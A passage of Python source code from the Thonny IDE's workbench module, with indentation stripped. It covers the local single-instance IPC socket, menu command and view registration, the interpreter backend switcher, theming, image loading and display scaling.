thonny.get_ipc_file_path()
):
self._ipc_requests = None
return
self._ipc_requests = queue.Queue() # type: queue.Queue[bytes]
server_socket, actual_secret = self._create_server_socket()
server_socket.listen(10)
def server_loop():
while True:
logging.debug("Waiting for next client")
(client_socket, _) = server_socket.accept()
try:
data = bytes()
while True:
new_data = client_socket.recv(1024)
if len(new_data) > 0:
data += new_data
else:
break
proposed_secret, args = ast.literal_eval(data.decode("UTF-8"))
if proposed_secret == actual_secret:
self._ipc_requests.put(args)
# respond OK
client_socket.sendall(SERVER_SUCCESS.encode(encoding="utf-8"))
client_socket.shutdown(socket.SHUT_WR)
logging.debug("AFTER NEW REQUEST %s", client_socket)
else:
client_socket.shutdown(socket.SHUT_WR)
raise PermissionError("Wrong secret")
except Exception:
traceback.print_exc()
Thread(target=server_loop, daemon=True).start()
def _create_server_socket(self):
if running_on_windows():
server_socket = socket.socket(socket.AF_INET) # @UndefinedVariable
server_socket.bind(("127.0.0.1", 0))
# advertise the port and secret
port = server_socket.getsockname()[1]
import uuid
secret = str(uuid.uuid4())
with open(thonny.get_ipc_file_path(), "w") as fp:
fp.write(str(port) + "\n")
fp.write(secret + "\n")
else:
server_socket = socket.socket(socket.AF_UNIX) # @UndefinedVariable
server_socket.bind(thonny.get_ipc_file_path())
secret = ""
os.chmod(thonny.get_ipc_file_path(), 0o600)
return server_socket, secret
def _init_commands(self) -> None:
self.add_command(
"exit",
"file",
tr("Exit"),
self._on_close,
default_sequence=select_sequence("<Alt-F4>", "<Command-q>", "<Control-q>"),
extra_sequences=["<Alt-F4>"]
if running_on_linux()
else ["<Control-q>"]
if running_on_windows()
else [],
)
self.add_command("show_options", "tools", tr("Options..."), self.show_options, group=180)
self.createcommand("::tk::mac::ShowPreferences", self.show_options)
self.createcommand("::tk::mac::Quit", self._mac_quit)
self.add_command(
"increase_font_size",
"view",
tr("Increase font size"),
lambda: self._change_font_size(1),
default_sequence=select_sequence("<Control-plus>", "<Command-Shift-plus>"),
extra_sequences=["<Control-KP_Add>"],
group=60,
)
self.add_command(
"decrease_font_size",
"view",
tr("Decrease font size"),
lambda: self._change_font_size(-1),
default_sequence=select_sequence("<Control-minus>", "<Command-minus>"),
extra_sequences=["<Control-KP_Subtract>"],
group=60,
)
self.bind("<Control-MouseWheel>", self._cmd_zoom_with_mouse, True)
self.add_command(
"focus_editor",
"view",
tr("Focus editor"),
self._cmd_focus_editor,
default_sequence=select_sequence("<Alt-e>", "<Command-Alt-e>"),
group=70,
)
self.add_command(
"focus_shell",
"view",
tr("Focus shell"),
self._cmd_focus_shell,
default_sequence=select_sequence("<Alt-s>", "<Command-Alt-s>"),
group=70,
)
if self.get_ui_mode() == "expert":
self.add_command(
"toggle_maximize_view",
"view",
tr("Maximize view"),
self._cmd_toggle_maximize_view,
flag_name="view.maximize_view",
default_sequence=None,
group=80,
)
self.bind_class("TNotebook", "<Double-Button-1>", self._maximize_view, True)
self.bind("<Escape>", self._unmaximize_view, True)
self.add_command(
"toggle_maximize_view",
"view",
tr("Full screen"),
self._cmd_toggle_full_screen,
flag_name="view.full_screen",
default_sequence=select_sequence("<F11>", "<Command-Shift-F>"),
group=80,
)
if self.in_simple_mode():
self.add_command(
"font",
"tools",
tr("Change font size"),
caption=tr("Zoom"),
handler=self._toggle_font_size,
image="zoom",
include_in_toolbar=True,
)
self.add_command(
"quit",
"help",
tr("Exit Thonny"),
self._on_close,
image="quit",
caption=tr("Quit"),
include_in_toolbar=True,
group=101,
)
if thonny.in_debug_mode():
self.bind_all("<Control-Shift-Alt-D>", self._print_state_for_debugging, True)
def _print_state_for_debugging(self, event) -> None:
print(get_runner()._postponed_commands)
def _init_containers(self) -> None:
margin = 10
# Main frame functions as
# - a backgroud behind padding of main_pw, without this OS X leaves white border
# - a container to be hidden, when a view is maximized and restored when view is back home
main_frame = ttk.Frame(self) #
self._main_frame = main_frame
main_frame.grid(row=1, column=0, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(1, weight=1)
self._maximized_view = None # type: Optional[tk.Widget]
self._toolbar = ttk.Frame(main_frame, padding=0)
self._toolbar.grid(column=0, row=0, sticky=tk.NSEW, padx=margin, pady=(5, 0))
self.set_default("layout.west_pw_width", self.scale(150))
self.set_default("layout.east_pw_width", self.scale(150))
self.set_default("layout.s_nb_height", self.scale(150))
self.set_default("layout.nw_nb_height", self.scale(150))
self.set_default("layout.sw_nb_height", self.scale(150))
self.set_default("layout.ne_nb_height", self.scale(150))
self.set_default("layout.se_nb_height", self.scale(150))
self._main_pw = AutomaticPanedWindow(main_frame, orient=tk.HORIZONTAL)
self._main_pw.grid(column=0, row=1, sticky=tk.NSEW, padx=margin, pady=(margin, 0))
main_frame.columnconfigure(0, weight=1)
main_frame.rowconfigure(1, weight=1)
self._west_pw = AutomaticPanedWindow(
self._main_pw,
1,
orient=tk.VERTICAL,
preferred_size_in_pw=self.get_option("layout.west_pw_width"),
)
self._center_pw = AutomaticPanedWindow(self._main_pw, 2, orient=tk.VERTICAL)
self._east_pw = AutomaticPanedWindow(
self._main_pw,
3,
orient=tk.VERTICAL,
preferred_size_in_pw=self.get_option("layout.east_pw_width"),
)
self._view_notebooks = {
"nw": AutomaticNotebook(
self._west_pw, 1, preferred_size_in_pw=self.get_option("layout.nw_nb_height")
),
"w": AutomaticNotebook(self._west_pw, 2),
"sw": AutomaticNotebook(
self._west_pw, 3, preferred_size_in_pw=self.get_option("layout.sw_nb_height")
),
"s": AutomaticNotebook(
self._center_pw, 3, preferred_size_in_pw=self.get_option("layout.s_nb_height")
),
"ne": AutomaticNotebook(
self._east_pw, 1, preferred_size_in_pw=self.get_option("layout.ne_nb_height")
),
"e": AutomaticNotebook(self._east_pw, 2),
"se": AutomaticNotebook(
self._east_pw, 3, preferred_size_in_pw=self.get_option("layout.se_nb_height")
),
}
for nb_name in self._view_notebooks:
self.set_default("layout.notebook_" + nb_name + "_visible_view", None)
self._editor_notebook = EditorNotebook(self._center_pw)
self._editor_notebook.position_key = 1
self._center_pw.insert("auto", self._editor_notebook)
self._statusbar = ttk.Frame(main_frame)
self._statusbar.grid(column=0, row=2, sticky="nsew", padx=margin, pady=(0))
self._statusbar.columnconfigure(2, weight=2)
self._status_label = ttk.Label(self._statusbar, text="")
self._status_label.grid(row=1, column=1, sticky="w")
self._init_backend_switcher()
def _init_backend_switcher(self):
# Set up the menu
self._backend_conf_variable = tk.StringVar(value="{}")
self._backend_menu = tk.Menu(self._statusbar, tearoff=False)
# Set up the button
self._backend_button = ttk.Button(self._statusbar, text="", style="Toolbutton")
self._backend_button.grid(row=1, column=3, sticky="e")
self._backend_button.configure(command=self._post_backend_menu)
def _post_backend_menu(self):
menu_font = tk_font.nametofont("TkMenuFont")
def choose_backend():
backend_conf = ast.literal_eval(self._backend_conf_variable.get())
assert isinstance(backend_conf, dict), "backend conf is %r" % backend_conf
for name, value in backend_conf.items():
self.set_option(name, value)
get_runner().restart_backend(False)
self._backend_menu.delete(0, "end")
max_description_width = 0
button_text_width = menu_font.measure(self._backend_button.cget("text"))
num_entries = 0
for backend in sorted(self.get_backends().values(), key=lambda x: x.sort_key):
entries = backend.proxy_class.get_switcher_entries()
if not entries:
continue
if len(entries) == 1:
self._backend_menu.add_radiobutton(
label=backend.description,
command=choose_backend,
variable=self._backend_conf_variable,
value=repr(entries[0][0]),
)
else:
submenu = tk.Menu(self._backend_menu, tearoff=False)
for conf, label in entries:
submenu.add_radiobutton(
label=label,
command=choose_backend,
variable=self._backend_conf_variable,
value=repr(conf),
)
self._backend_menu.add_cascade(label=backend.description, menu=submenu)
max_description_width = max(
menu_font.measure(backend.description), max_description_width
)
num_entries += 1
# self._backend_conf_variable.set(value=self.get_option("run.backend_name"))
self._backend_menu.add_separator()
self._backend_menu.add_command(
label=tr("Configure interpreter..."),
command=lambda: self.show_options("interpreter"),
)
post_x = self._backend_button.winfo_rootx()
post_y = self._backend_button.winfo_rooty()
if self.winfo_screenwidth() / self.winfo_screenheight() > 2:
# Most likely several monitors.
# Tk will adjust x properly with single monitor, but when Thonny is maximized
# on a monitor, which has another monitor to its right, the menu can be partially
# displayed on another monitor (at least in Ubuntu).
width_diff = max_description_width - button_text_width
post_x -= width_diff + menu_font.measure("mmm")
if running_on_mac_os():
# won't be good location otherwise
popup_entry = num_entries + 4
else:
popup_entry = ""
# print(post_x, post_y)
try:
self._backend_menu.tk_popup(post_x, post_y, entry=popup_entry)
except tk.TclError as e:
if not 'unknown option "-state"' in str(e):
logger.warning("Problem with switcher popup", exc_info=e)
def _on_backend_restart(self, event):
proxy = get_runner().get_backend_proxy()
if proxy:
desc = proxy.get_clean_description()
self._backend_conf_variable.set(value=repr(proxy.get_current_switcher_configuration()))
else:
backend_conf = self._backends.get(self.get_option("run.backend_name"), None)
if backend_conf:
desc = backend_conf.description
else:
desc = "<no backend>"
self._backend_button.configure(text=desc)
def _init_theming(self) -> None:
self._style = ttk.Style()
self._ui_themes = (
{}
) # type: Dict[str, Tuple[Optional[str], FlexibleUiThemeSettings, Dict[str, str]]] # value is (parent, settings, images)
self._syntax_themes = (
{}
) # type: Dict[str, Tuple[Optional[str], FlexibleSyntaxThemeSettings]] # value is (parent, settings)
self.set_default("view.ui_theme", ui_utils.get_default_theme())
def add_command(
self,
command_id: str,
menu_name: str,
command_label: str,
handler: Optional[Callable[[], None]] = None,
tester: Optional[Callable[[], bool]] = None,
default_sequence: Optional[str] = None,
extra_sequences: Sequence[str] = [],
flag_name: Optional[str] = None,
skip_sequence_binding: bool = False,
accelerator: Optional[str] = None,
group: int = 99,
position_in_group="end",
image: Optional[str] = None,
caption: Optional[str] = None,
alternative_caption: Optional[str] = None,
include_in_menu: bool = True,
include_in_toolbar: bool = False,
submenu: Optional[tk.Menu] = None,
bell_when_denied: bool = True,
show_extra_sequences=False,
) -> None:
"""Registers an item to be shown in specified menu.
Args:
menu_name: Name of the menu the command should appear in.
Standard menu names are "file", "edit", "run", "view", "help".
If a menu with given name doesn't exist, then new menu is created
(with label=name).
command_label: Label for this command
handler: Function to be called when the command is invoked.
Should be callable with one argument (the event or None).
tester: Function to be called for determining if command is available or not.
Should be callable with one argument (the event or None).
Should return True or False.
If None then command is assumed to be always available.
default_sequence: Default shortcut (Tk style)
flag_name: Used for toggle commands. Indicates the name of the boolean option.
group: Used for grouping related commands together. Value should be int.
Groups with smaller numbers appear before.
Returns:
None
"""
# Temporary solution for plug-ins made for versions before 3.2
if menu_name == "device":
menu_name = "tools"
group = 150
# store command to be published later
self._commands.append(
dict(
command_id=command_id,
menu_name=menu_name,
command_label=command_label,
handler=handler,
tester=tester,
default_sequence=default_sequence,
extra_sequences=extra_sequences,
flag_name=flag_name,
skip_sequence_binding=skip_sequence_binding,
accelerator=accelerator,
group=group,
position_in_group=position_in_group,
image=image,
caption=caption,
alternative_caption=alternative_caption,
include_in_menu=include_in_menu,
include_in_toolbar=include_in_toolbar,
submenu=submenu,
bell_when_denied=bell_when_denied,
show_extra_sequences=show_extra_sequences,
)
)
def _publish_commands(self) -> None:
for cmd in self._commands:
self._publish_command(**cmd)
def _publish_command(
self,
command_id: str,
menu_name: str,
command_label: str,
handler: Optional[Callable[[], None]],
tester: Optional[Callable[[], bool]] = None,
default_sequence: Optional[str] = None,
extra_sequences: Sequence[str] = [],
flag_name: Optional[str] = None,
skip_sequence_binding: bool = False,
accelerator: Optional[str] = None,
group: int = 99,
position_in_group="end",
image: Optional[str] = None,
caption: Optional[str] = None,
alternative_caption: Optional[str] = None,
include_in_menu: bool = True,
include_in_toolbar: bool = False,
submenu: Optional[tk.Menu] = None,
bell_when_denied: bool = True,
show_extra_sequences: bool = False,
) -> None:
def dispatch(event=None):
if not tester or tester():
denied = False
handler()
else:
denied = True
logging.debug("Command '" + command_id + "' execution denied")
if bell_when_denied:
self.bell()
self.event_generate("UICommandDispatched", command_id=command_id, denied=denied)
sequence_option_name = "shortcuts." + command_id
self.set_default(sequence_option_name, default_sequence)
sequence = self.get_option(sequence_option_name)
if sequence:
if not skip_sequence_binding:
self.bind_all(sequence, dispatch, True)
# register shortcut even without binding
register_latin_shortcut(self._latin_shortcuts, sequence, handler, tester)
for extra_sequence in extra_sequences:
self.bind_all(extra_sequence, dispatch, True)
if "greek_" not in extra_sequence.lower() or running_on_linux():
# Use greek alternatives only on Linux
# (they are not required on Mac
# and cause double events on Windows)
register_latin_shortcut(self._latin_shortcuts, sequence, handler, tester)
menu = self.get_menu(menu_name)
if image:
_image = self.get_image(image) # type: Optional[tk.PhotoImage]
_disabled_image = self.get_image(image, disabled=True)
else:
_image = None
_disabled_image = None
if not accelerator and sequence:
accelerator = sequence_to_accelerator(sequence)
"""
# Does not work on Mac
if show_extra_sequences:
for extra_seq in extra_sequences:
accelerator += " or " + sequence_to_accelerator(extra_seq)
"""
if include_in_menu:
def dispatch_from_menu():
# I don't like that Tk menu toggles checbutton variable
# automatically before calling the handler.
# So I revert the toggle before calling the actual handler.
# This way the handler doesn't have to worry whether it
# needs to toggle the variable or not, and it can choose to
# decline the toggle.
if flag_name is not None:
var = self.get_variable(flag_name)
var.set(not var.get())
dispatch(None)
if _image and lookup_style_option("OPTIONS", "icons_in_menus", True):
menu_image = _image # type: Optional[tk.PhotoImage]
elif flag_name:
# no image or black next to a checkbox
menu_image = None
else:
menu_image = self.get_image("16x16-blank")
# remember the details that can't be stored in Tkinter objects
self._menu_item_specs[(menu_name, command_label)] = MenuItem(
group, position_in_group, tester
)
menu.insert(
self._find_location_for_menu_item(menu_name, command_label),
"checkbutton" if flag_name else "cascade" if submenu else "command",
label=command_label,
accelerator=accelerator,
image=menu_image,
compound=tk.LEFT,
variable=self.get_variable(flag_name) if flag_name else None,
command=dispatch_from_menu if handler else None,
menu=submenu,
)
if include_in_toolbar:
toolbar_group = self._get_menu_index(menu) * 100 + group
assert caption is not None
self._add_toolbar_button(
command_id,
_image,
_disabled_image,
command_label,
caption,
caption if alternative_caption is None else alternative_caption,
accelerator,
handler,
tester,
toolbar_group,
)
def add_view(
self,
cls: Type[tk.Widget],
label: str,
default_location: str,
visible_by_default: bool = False,
default_position_key: Optional[str] = None,
) -> None:
"""Adds item to "View" menu for showing/hiding given view.
Args:
view_class: Class or constructor for view. Should be callable with single
argument (the master of the view)
label: Label of the view tab
location: Location descriptor. Can be "nw", "sw", "s", "se", "ne"
Returns: None
"""
view_id = cls.__name__
if default_position_key == None:
default_position_key = label
self.set_default("view." + view_id + ".visible", visible_by_default)
self.set_default("view." + view_id + ".location", default_location)
self.set_default("view." + view_id + ".position_key", default_position_key)
if self.in_simple_mode():
visibility_flag = tk.BooleanVar(value=view_id in SIMPLE_MODE_VIEWS)
else:
visibility_flag = cast(tk.BooleanVar, self.get_variable("view." + view_id + ".visible"))
self._view_records[view_id] = {
"class": cls,
"label": label,
"location": self.get_option("view." + view_id + ".location"),
"position_key": self.get_option("view." + view_id + ".position_key"),
"visibility_flag": visibility_flag,
}
# handler
def toggle_view_visibility():
if visibility_flag.get():
self.hide_view(view_id)
else:
self.show_view(view_id, True)
self.add_command(
"toggle_" + view_id,
menu_name="view",
command_label=label,
handler=toggle_view_visibility,
flag_name="view." + view_id + ".visible",
group=10,
position_in_group="alphabetic",
)
def add_configuration_page(
self, key: str, title: str, page_class: Type[tk.Widget], order: int
) -> None:
self._configuration_pages.append((key, title, page_class, order))
def add_content_inspector(self, inspector_class: Type) -> None:
self.content_inspector_classes.append(inspector_class)
def add_backend(
self,
name: str,
proxy_class: Type[BackendProxy],
description: str,
config_page_constructor,
sort_key=None,
) -> None:
self._backends[name] = BackendSpec(
name,
proxy_class,
description,
config_page_constructor,
sort_key if sort_key is not None else description,
)
# assing names to related classes
proxy_class.backend_name = name # type: ignore
proxy_class.backend_description = description # type: ignore
if not getattr(config_page_constructor, "backend_name", None):
config_page_constructor.backend_name = name
def add_ui_theme(
self,
name: str,
parent: Union[str, None],
settings: FlexibleUiThemeSettings,
images: Dict[str, str] = {},
) -> None:
if name in self._ui_themes:
warn(tr("Overwriting theme '%s'") % name)
self._ui_themes[name] = (parent, settings, images)
def add_syntax_theme(
self, name: str, parent: Optional[str], settings: FlexibleSyntaxThemeSettings
) -> None:
if name in self._syntax_themes:
warn(tr("Overwriting theme '%s'") % name)
self._syntax_themes[name] = (parent, settings)
def get_usable_ui_theme_names(self) -> Sequence[str]:
return sorted([name for name in self._ui_themes if self._ui_themes[name][0] is not None])
def get_syntax_theme_names(self) -> Sequence[str]:
return sorted(self._syntax_themes.keys())
def get_ui_mode(self) -> str:
return self._active_ui_mode
def in_simple_mode(self) -> bool:
return self.get_ui_mode() == "simple"
def scale(self, value: Union[int, float]) -> int:
if isinstance(value, (int, float)):
# using int instead of round so that thin lines will stay
# one pixel even with scaling_factor 1.67
result = int(self._scaling_factor * value)
if result == 0 and value > 0:
# don't lose thin lines because of scaling
return 1
else:
return result
else:
raise NotImplementedError("Only numeric dimensions supported at the moment")
def _register_ui_theme_as_tk_theme(self, name: str) -> None:
# collect settings from all ancestors
total_settings = [] # type: List[FlexibleUiThemeSettings]
total_images = {} # type: Dict[str, str]
temp_name = name
while True:
parent, settings, images = self._ui_themes[temp_name]
total_settings.insert(0, settings)
for img_name in images:
total_images.setdefault(img_name, images[img_name])
if parent is not None:
temp_name = parent
else:
# reached start of the chain
break
assert temp_name in self._style.theme_names()
# only root of the ancestors is relevant for theme_create,
# because the method actually doesn't take parent settings into account
# (https://mail.python.org/pipermail/tkinter-discuss/2015-August/003752.html)
self._style.theme_create(name, temp_name)
self._image_mapping_by_theme[name] = total_images
# load images
self.get_image("tab-close", "img_close")
self.get_image("tab-close-active", "img_close_active")
# apply settings starting from root ancestor
for settings in total_settings:
if callable(settings):
settings = settings()
if isinstance(settings, dict):
self._style.theme_settings(name, settings)
else:
for subsettings in settings:
self._style.theme_settings(name, subsettings)
def _apply_ui_theme(self, name: str) -> None:
self._current_theme_name = name
if name not in self._style.theme_names():
self._register_ui_theme_as_tk_theme(name)
self._style.theme_use(name)
# https://wiki.tcl.tk/37973#pagetocfe8b22ab
for setting in ["background", "foreground", "selectBackground", "selectForeground"]:
value = self._style.lookup("Listbox", setting)
if value:
self.option_add("*TCombobox*Listbox." + setting, value)
self.option_add("*Listbox." + setting, value)
text_opts = self._style.configure("Text")
if text_opts:
for key in text_opts:
self.option_add("*Text." + key, text_opts[key])
if hasattr(self, "_menus"):
# if menus have been initialized, ie. when theme is being changed
for menu in self._menus.values():
menu.configure(get_style_configuration("Menu"))
self.update_fonts()
def _apply_syntax_theme(self, name: str) -> None:
def get_settings(name):
try:
parent, settings = self._syntax_themes[name]
except KeyError:
self.report_exception("Can't find theme '%s'" % name)
return {}
if callable(settings):
settings = settings()
if parent is None:
return settings
else:
result = get_settings(parent)
for key in settings:
if key in result:
result[key].update(settings[key])
else:
result[key] = settings[key]
return result
from thonny import codeview
codeview.set_syntax_options(get_settings(name))
def reload_themes(self) -> None:
preferred_theme = self.get_option("view.ui_theme")
available_themes = self.get_usable_ui_theme_names()
if preferred_theme in available_themes:
self._apply_ui_theme(preferred_theme)
elif "Enhanced Clam" in available_themes:
self._apply_ui_theme("Enhanced Clam")
elif "Windows" in available_themes:
self._apply_ui_theme("Windows")
self._apply_syntax_theme(self.get_option("view.syntax_theme"))
def uses_dark_ui_theme(self) -> bool:
name = self._style.theme_use()
while True:
if "dark" in name.lower():
return True
name, _, _ = self._ui_themes[name]
if name is None:
# reached start of the chain
break
return False
def _init_program_arguments_frame(self) -> None:
self.set_default("view.show_program_arguments", False)
self.set_default("run.program_arguments", "")
self.set_default("run.past_program_arguments", [])
visibility_var = self.get_variable("view.show_program_arguments")
content_var = self.get_variable("run.program_arguments")
frame = ttk.Frame(self._toolbar)
col = 1000
self._toolbar.columnconfigure(col, weight=1)
label = ttk.Label(frame, text=tr("Program arguments:"))
label.grid(row=0, column=0, sticky="nse", padx=5)
self.program_arguments_box = ttk.Combobox(
frame,
width=80,
height=15,
textvariable=content_var,
values=[""] + self.get_option("run.past_program_arguments"),
)
self.program_arguments_box.grid(row=0, column=1, sticky="nsew", padx=5)
frame.columnconfigure(1, weight=1)
def update_visibility():
if visibility_var.get():
if not frame.winfo_ismapped():
frame.grid(row=0, column=col, sticky="nse")
else:
if frame.winfo_ismapped():
frame.grid_remove()
def toggle():
visibility_var.set(not visibility_var.get())
update_visibility()
self.add_command(
"viewargs",
"view",
tr("Program arguments"),
toggle,
flag_name="view.show_program_arguments",
group=11,
)
update_visibility()
def _init_regular_mode_link(self):
if self.get_ui_mode() != "simple":
return
label = ttk.Label(
self._toolbar,
text=tr("Switch to\nregular\nmode"),
justify="right",
font="SmallLinkFont",
style="Url.TLabel",
cursor="hand2",
)
label.grid(row=0, column=1001, sticky="ne")
def on_click(event):
self.set_option("general.ui_mode", "regular")
tk.messagebox.showinfo(
tr("Regular mode"),
tr(
"Configuration has been updated. "
+ "Restart Thonny to start working in regular mode.\n\n"
+ "(See 'Tools → Options → General' if you change your mind later.)"
),
master=self,
)
label.bind("<1>", on_click, True)
def _switch_backend_group(self, group):
pass
def _switch_darkness(self, mode):
pass
def _switch_to_regular_mode(self):
pass
def log_program_arguments_string(self, arg_str: str) -> None:
arg_str = arg_str.strip()
self.set_option("run.program_arguments", arg_str)
if arg_str == "":
# empty will be handled differently
return
past_args = self.get_option("run.past_program_arguments")
if arg_str in past_args:
past_args.remove(arg_str)
past_args.insert(0, arg_str)
past_args = past_args[:10]
self.set_option("run.past_program_arguments", past_args)
self.program_arguments_box.configure(values=[""] + past_args)
def _show_views(self) -> None:
for view_id in self._view_records:
if self._view_records[view_id]["visibility_flag"].get():
try:
self.show_view(view_id, False)
except Exception:
self.report_exception("Problem showing " + view_id)
def update_image_mapping(self, mapping: Dict[str, str]) -> None:
"""Was used by thonny-pi. Not recommended anymore"""
self._default_image_mapping.update(mapping)
def get_backends(self) -> Dict[str, BackendSpec]:
return self._backends
def get_option(self, name: str, default=None) -> Any:
# Need to return Any, otherwise each typed call site needs to cast
return self._configuration_manager.get_option(name, default)
def set_option(self, name: str, value: Any) -> None:
self._configuration_manager.set_option(name, value)
def get_local_cwd(self) -> str:
cwd = self.get_option("run.working_directory")
if os.path.exists(cwd):
return normpath_with_actual_case(cwd)
else:
return normpath_with_actual_case(os.path.expanduser("~"))
def set_local_cwd(self, value: str) -> None:
if self.get_option("run.working_directory") != value:
self.set_option("run.working_directory", value)
if value:
self.event_generate("LocalWorkingDirectoryChanged", cwd=value)
def set_default(self, name: str, default_value: Any) -> None:
"""Registers a new option.
If the name contains a period, then the part left to the (first) period
will become the section of the option and rest will become name under that
section.
If the name doesn't contain a period, then it will be added under section
"general".
"""
self._configuration_manager.set_default(name, default_value)
def get_variable(self, name: str) -> tk.Variable:
return self._configuration_manager.get_variable(name)
def get_menu(self, name: str, label: Optional[str] = None) -> tk.Menu:
"""Gives the menu with given name. Creates if not created yet.
Args:
name: meant to be used as not translatable menu name
label: translated label, used only when menu with given name doesn't exist yet
"""
# For compatibility with plug-ins
if name in ["device", "tempdevice"] and label is None:
label = tr("Device")
if name not in self._menus:
if running_on_mac_os():
conf = {}
else:
conf = get_style_configuration("Menu")
menu = tk.Menu(self._menubar, **conf)
menu["postcommand"] = lambda: self._update_menu(menu, name)
self._menubar.add_cascade(label=label if label else name, menu=menu)
self._menus[name] = menu
if label:
self._menus[label] = menu
return self._menus[name]
def get_view(self, view_id: str, create: bool = True) -> tk.Widget:
if "instance" not in self._view_records[view_id]:
if not create:
raise RuntimeError("View %s not created" % view_id)
class_ = self._view_records[view_id]["class"]
location = self._view_records[view_id]["location"]
master = self._view_notebooks[location]
# create the view
view = class_(self) # View's master is workbench to allow making it maximized
view.position_key = self._view_records[view_id]["position_key"]
self._view_records[view_id]["instance"] = view
# create the view home_widget to be added into notebook
view.home_widget = ttk.Frame(master)
view.home_widget.columnconfigure(0, weight=1)
view.home_widget.rowconfigure(0, weight=1)
view.home_widget.maximizable_widget = view # type: ignore
view.home_widget.close = lambda: self.hide_view(view_id) # type: ignore
if hasattr(view, "position_key"):
view.home_widget.position_key = view.position_key # type: ignore
# initially the view will be in it's home_widget
view.grid(row=0, column=0, sticky=tk.NSEW, in_=view.home_widget)
view.hidden = True
return self._view_records[view_id]["instance"]
def get_editor_notebook(self) -> EditorNotebook:
assert self._editor_notebook is not None
return self._editor_notebook
def get_package_dir(self):
"""Returns thonny package directory"""
return os.path.dirname(sys.modules["thonny"].__file__)
def get_image(
self, filename: str, tk_name: Optional[str] = None, disabled=False
) -> tk.PhotoImage:
if filename in self._image_mapping_by_theme[self._current_theme_name]:
filename = self._image_mapping_by_theme[self._current_theme_name][filename]
if filename in self._default_image_mapping:
filename = self._default_image_mapping[filename]
# if path is relative then interpret it as living in res folder
if not os.path.isabs(filename):
filename = os.path.join(self.get_package_dir(), "res", filename)
if not os.path.exists(filename):
if os.path.exists(filename + ".png"):
filename = filename + ".png"
elif os.path.exists(filename + ".gif"):
filename = filename + ".gif"
if disabled:
filename = os.path.join(
os.path.dirname(filename), "_disabled_" + os.path.basename(filename)
)
if not os.path.exists(filename):
return None
# are there platform-specific variants?
plat_filename = filename[:-4] + "_" + platform.system() + ".png"
if os.path.exists(plat_filename):
filename = plat_filename
if self._scaling_factor >= 2.0:
scaled_filename = filename[:-4] + "_2x.png"
if os.path.exists(scaled_filename):
filename = scaled_filename
else:
img = tk.PhotoImage(file=filename)
# can't use zoom method, because this doesn't allow name
img2 = tk.PhotoImage(tk_name)
self.tk.call(
img2,
"copy",
img.name,
"-zoom",
int(self._scaling_factor),
int(self._scaling_factor),
)
self._images.add(img2)
return img2
img = tk.PhotoImage(tk_name, file=filename)
self._images.add(img)
return img
def show_view(self, view_id: str, set_focus: bool = True) -> Union[bool, tk.Widget]:
"""View must be already registered.
Args:
view_id: View class name
without package name (eg. 'ShellView')"""
if view_id == "MainFileBrowser":
# Was renamed in 3.1.1
view_id = "FilesView"
# NB! Don't forget that view.home_widget is added to notebook, not view directly
# get or create
view = self.get_view(view_id)
notebook = view.home_widget.master # type: ignore
if hasattr(view, "before_show") and view.before_show() == False: # type: ignore
return False
if view.hidden: # type: ignore
notebook.insert(
"auto", view.home_widget, text=self._view_records[view_id]["label"] # type: ignore
)
view.hidden = False # type: ignore
if hasattr(view, "on_show"): # type: ignore
view.on_show()
# switch to the tab
notebook.select(view.home_widget) # type: ignore
# add focus
if set_focus:
view.focus_set()
self.set_option("view." + view_id + ".visible", True)
self.event_generate("ShowView", view=view, view_id=view_id)
return view
def hide_view(self, view_id: str) -> Union[bool, None]:
# NB! Don't forget that view.home_widget is added to notebook, not view directly
if "instance" in self._view_records[view_id]:
# TODO: handle the case, when view is maximized
view = self._view_records[view_id]["instance"]
if view.hidden:
return True
if hasattr(view, "before_hide") and view.before_hide() == False:
return False
view.home_widget.master.forget(view.home_widget)
self.set_option("view." + view_id + ".visible", False)
self.event_generate("HideView", view=view, view_id=view_id)
view.hidden = True
return True
def event_generate(self, sequence: str, event: Optional[Record] = None, **kwargs) -> None:
"""Uses custom event handling when sequence doesn't start with <.
In this case arbitrary attributes can be added to the event.
Otherwise forwards the call to Tk's event_generate"""
# pylint: disable=arguments-differ
if sequence.startswith("<"):
assert event is None
tk.Tk.event_generate(self, sequence, **kwargs)
else:
if sequence in self._event_handlers:
if event is None:
event = WorkbenchEvent(sequence, **kwargs)
else:
event.update(kwargs)
# make a copy of handlers, so that event handler can remove itself
# from the registry during iteration
# (or new handlers can be added)
for handler in sorted(self._event_handlers[sequence].copy(), key=str):
try:
handler(event)
except Exception:
self.report_exception("Problem when handling '" + sequence + "'")
if not self._closing:
self._update_toolbar()
def bind(self, sequence: str, func: Callable, add: bool = None) -> None: # type: ignore
"""Uses custom event handling when sequence doesn't start with <.
Otherwise forwards the call to Tk's bind"""
# pylint: disable=signature-differs
if not add:
logging.warning(
"Workbench.bind({}, ..., add={}) -- did you really want to replace existing bindings?".format(
sequence, add
)
)
if sequence.startswith("<"):
tk.Tk.bind(self, sequence, func, add)
else:
if sequence not in self._event_handlers or not add:
self._event_handlers[sequence] = set()
self._event_handlers[sequence].add(func)
def unbind(self, sequence: str, func=None) -> None:
# pylint: disable=arguments-differ
if sequence.startswith("<"):
tk.Tk.unbind(self, sequence, funcid=func)
else:
try:
self._event_handlers[sequence].remove(func)
except Exception:
logger.exception("Can't remove binding for '%s' and '%s'", sequence, func)
def in_heap_mode(self) -> bool:
# TODO: add a separate command for enabling the heap mode
# untie the mode from HeapView
return self._configuration_manager.has_option("view.HeapView.visible") and self.get_option(
"view.HeapView.visible"
)
def in_debug_mode(self) -> bool:
return (
os.environ.get("THONNY_DEBUG", False)
in [
"1",
1,
"True",
True,
"true",
]
or self.get_option("general.debug_mode", False)
)
def _init_scaling(self) -> None:
self._default_scaling_factor = self.tk.call("tk", "scaling")
if self._default_scaling_factor > 10:
# it may be infinity in eg. Fedora
self._default_scaling_factor = 1.33
scaling = self.get_option("general.scaling")
if scaling in ["default", "auto"]: # auto was used in 2.2b3
self._scaling_factor = self._default_scaling_factor
else:
self._scaling_factor = float(scaling)
MAC_SCALING_MODIFIER = 1.7
if running_on_mac_os():
self._scaling_factor *= MAC_SCALING_MODIFIER
self.tk.call("tk", "scaling", self._scaling_factor)
font_scaling_mode = self.get_option("general.font_scaling_mode")
if (
running_on_linux()
and font_scaling_mode in ["default", "extra"]
and scaling not in ["default", "auto"]
):
# update system fonts which are given in pixel sizes
for name in tk_font.names():
f = tk_font.nametofont(name)
orig_size = f.cget("size")
# According to do documentation, absolute values of negative font sizes
# should be interpreted as pixel sizes (not affected by "tk scaling")
# and positive values are point sizes, which are supposed to scale automatically
# http://www.tcl.tk/man/tcl8.6/TkCmd/font.htm#M26
